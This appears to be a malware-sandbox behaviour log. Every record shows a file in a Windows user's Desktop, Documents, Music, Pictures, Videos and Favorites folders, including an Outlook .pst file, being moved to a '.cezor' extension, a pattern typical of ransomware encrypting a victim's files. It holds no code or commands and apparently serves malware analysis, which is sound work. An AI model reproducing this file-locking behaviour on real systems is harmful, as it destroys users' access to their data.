Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Pdn3smOfWiyL_KFEcP0.mp4.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Pdn3smOfWiyL_KFEcP0.mp4 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\PoDqxcM TSaz.swf.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\PoDqxcM TSaz.swf True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\TeVS.mp4.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\TeVS.mp4 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\TyHbSH6VrF3xX.mp3.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\TyHbSH6VrF3xX.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uVeSXOWXfi_KaHM6.swf.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uVeSXOWXfi_KaHM6.swf True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uVgxMcsEjpWpZrN.jpg.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uVgxMcsEjpWpZrN.jpg True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wjaMa6Mk-99x.gif.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wjaMa6Mk-99x.gif True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Xe1YhHNVlwT k.wav.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Xe1YhHNVlwT k.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Xk2XWRW.flv.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Xk2XWRW.flv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\_34_nkr.wav.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\_34_nkr.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\2 YiCSGLLTlIDeQ.doc.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\2 YiCSGLLTlIDeQ.doc True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\3fgk.pps.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\3fgk.pps True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\3kKQ7nGkbpOOq-1 5zRt.pptx.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\3kKQ7nGkbpOOq-1 5zRt.pptx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\45LEiyxnf Plrmb.docx.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\45LEiyxnf Plrmb.docx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\5Jnu XQUnVKH6.xlsx.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\5Jnu XQUnVKH6.xlsx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\5W-053pafC.pps.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\5W-053pafC.pps True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\AGokm2hLuNsPkZ.pptx.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\AGokm2hLuNsPkZ.pptx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\BUziw_klSFTDwvC1Vm.pptx.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\BUziw_klSFTDwvC1Vm.pptx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Dtk7xvzoVk_gCAUAkb.xlsx.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Dtk7xvzoVk_gCAUAkb.xlsx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\EDFXHniYi.docx.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\EDFXHniYi.docx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\EGkqtCRNREaQo4XfBL.ods.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\EGkqtCRNREaQo4XfBL.ods True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\G-R5IPPjXNO2pufW-w.pptx.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\G-R5IPPjXNO2pufW-w.pptx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\k0bYHnrNfY0Z01.docx.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\k0bYHnrNfY0Z01.docx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\kbQLv1HzRjuGX8_0 ow.pptx.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\kbQLv1HzRjuGX8_0 ow.pptx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\M0viuAr.pptx.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\M0viuAr.pptx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mJD0Lk7dF2uj7fNWL.doc.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mJD0Lk7dF2uj7fNWL.doc True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mpW-3B9.xlsx.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mpW-3B9.xlsx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\NU9iOZGfDM.xlsx.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\NU9iOZGfDM.xlsx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ol37DpMB ADCzniH6.docx.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ol37DpMB ADCzniH6.docx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\OlNTdQSKj.csv.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\OlNTdQSKj.csv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rMkTON600uD2.docx.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rMkTON600uD2.docx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\umnYAxK8Hd5gj.pptx.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\umnYAxK8Hd5gj.pptx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yBWTsx0.xlsx.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yBWTsx0.xlsx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yNFdhsIRJWbx9.pptx.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yNFdhsIRJWbx9.pptx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\-Utu5uTreh3_BFU.mp3.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\-Utu5uTreh3_BFU.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\2ZgBE.wav.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\2ZgBE.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\3lDgGO6UTyrOsMHE.mp3.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\3lDgGO6UTyrOsMHE.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\5V1FT5g1rxSJJ41de.m4a.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\5V1FT5g1rxSJJ41de.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\7HJiH UDq9SzzeN5I.m4a.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\7HJiH UDq9SzzeN5I.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\8ywMFiXrJ1mJNTYk.wav.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\8ywMFiXrJ1mJNTYk.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\Fnpi8zzFvSVq9mHNij76.wav.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\Fnpi8zzFvSVq9mHNij76.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\HX-X27lPA60A4.m4a.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\HX-X27lPA60A4.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\i0vpbCxKUDj27FIiTrf.wav.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\i0vpbCxKUDj27FIiTrf.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\KbAGa_jf9A0p1.mp3.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\KbAGa_jf9A0p1.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\LgZcOmajdnsesY.m4a.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\LgZcOmajdnsesY.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\nexJic6.wav.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\nexJic6.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\NN082DlMLC6MxmlQyS42.wav.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\NN082DlMLC6MxmlQyS42.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\tbTKJ0ZxbS6wZlGEphR.wav.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\tbTKJ0ZxbS6wZlGEphR.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\ucbmmg-N-J.wav.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\ucbmmg-N-J.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\wAomAj1M-1.mp3.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\wAomAj1M-1.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\wEWdm1lt.wav.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\wEWdm1lt.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\wHquroq M2bDSunIrjJ.wav.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\wHquroq M2bDSunIrjJ.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\XQtttNc8l WMW7IPg.m4a.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\XQtttNc8l WMW7IPg.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\_9l8.wav.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\_9l8.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\_D7Y.m4a.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\_D7Y.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\-W0-.gif.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\-W0-.gif True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\Aor58F2ltwiS2qWZJE.bmp.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\Aor58F2ltwiS2qWZJE.bmp True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\FDQ3v_tHbiNjViuE.jpg.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\FDQ3v_tHbiNjViuE.jpg True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\hiUvM1waNbZk-e.bmp.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\hiUvM1waNbZk-e.bmp True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\jMNoGbN.gif.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\jMNoGbN.gif True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\L4Lb_VKCFG5Baj3.gif.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\L4Lb_VKCFG5Baj3.gif True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\MCZaDa0QQJ6wcNZUXn.gif.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\MCZaDa0QQJ6wcNZUXn.gif True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\MkdmiW2n2hm UFrse-.bmp.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\MkdmiW2n2hm UFrse-.bmp True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OFMo70Ypi.jpg.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OFMo70Ypi.jpg True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\QoXfvFeQOhQIV.png.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\QoXfvFeQOhQIV.png True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\S4GQ2GGMfzy1DKUl.png.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\S4GQ2GGMfzy1DKUl.png True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\VyatE0vXWAqC0OxRt_.jpg.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\VyatE0vXWAqC0OxRt_.jpg True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\y18suG.gif.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\y18suG.gif True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\M45yR7c437.avi.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\M45yR7c437.avi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ReEw7jE5wqOg.swf.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ReEw7jE5wqOg.swf True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0oqCmMdMfyA -VyQ\am8f6gN_e89TbRknT.wav.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0oqCmMdMfyA -VyQ\am8f6gN_e89TbRknT.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0oqCmMdMfyA -VyQ\gW8MJuJm9dKBS.swf.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0oqCmMdMfyA -VyQ\gW8MJuJm9dKBS.swf True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\4_mbPPGlzHp_oUuJ-H3Z.bmp.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\4_mbPPGlzHp_oUuJ-H3Z.bmp True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\6lkmIZ.jpg.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\6lkmIZ.jpg True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\bYco6U CoNywT.ots.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\bYco6U CoNywT.ots True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\sH_lIdhNg4 u9hq.xls.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\sH_lIdhNg4 u9hq.xls True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\UB qDPSTcD6SsAM5.pdf.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\UB qDPSTcD6SsAM5.pdf True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\4k4 81HVDXuJOl.odp.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\4k4 81HVDXuJOl.odp True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\eMppgNp_d0eONIt.mp4.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\eMppgNp_d0eONIt.mp4 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\ok1IxJmM0MNDy1z2SKRW.odp.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\ok1IxJmM0MNDy1z2SKRW.odp True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\Rqjkx-Inyu564.bmp.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\Rqjkx-Inyu564.bmp True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\wpZkXn.mp4.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\wpZkXn.mp4 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\wWuRiwRN3-J7Oj9WP.jpg.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\wWuRiwRN3-J7Oj9WP.jpg True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\Favorites.vss.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\Favorites.vss True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\68l k.odp.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\68l k.odp True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\foWRjFtWYtlcWkIBF.ppt.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\foWRjFtWYtlcWkIBF.ppt True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\l8IL3_dOyLyH.odp.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\l8IL3_dOyLyH.odp True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\QITXJJCFSuy.rtf.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\QITXJJCFSuy.rtf True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\wYeZ7WgnHNP8l.rtf.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\wYeZ7WgnHNP8l.rtf True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\AwfOXmr1.mp3.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\AwfOXmr1.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\hd0rzFg.m4a.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\hd0rzFg.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\j34KVbd 7j.mp3.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\j34KVbd 7j.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\KeEk_O9.mp3.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\KeEk_O9.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\lGrnoXKuinB.m4a.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\lGrnoXKuinB.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\lWn6_.m4a.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\lWn6_.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\MChYwIiGCBst93Q.wav.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\MChYwIiGCBst93Q.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\O_o33d.m4a.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\O_o33d.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\RU_Ytkp2w qp.mp3.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\RU_Ytkp2w qp.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\sGdLslAC.mp3.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\sGdLslAC.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\twAQxH8FOS.m4a.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\twAQxH8FOS.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\W783g cZVYe_Q3ZTfs.mp3.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\W783g cZVYe_Q3ZTfs.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\_BaDSqvWqTCo.m4a.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\_BaDSqvWqTCo.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\-ExuX9LOjl2Rf0Z.png.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\-ExuX9LOjl2Rf0Z.png True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\3mlI5OW4Ceei.png.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\3mlI5OW4Ceei.png True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\4iAitK.png.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\4iAitK.png True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\4X0WuHIKFlmcsmSj8wH.jpg.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\4X0WuHIKFlmcsmSj8wH.jpg True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\60jL.jpg.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\60jL.jpg True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\AfHqN B.gif.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\AfHqN B.gif True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\u3J7SbbSL4_idzLNM.bmp.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\u3J7SbbSL4_idzLNM.bmp True 1
Fn
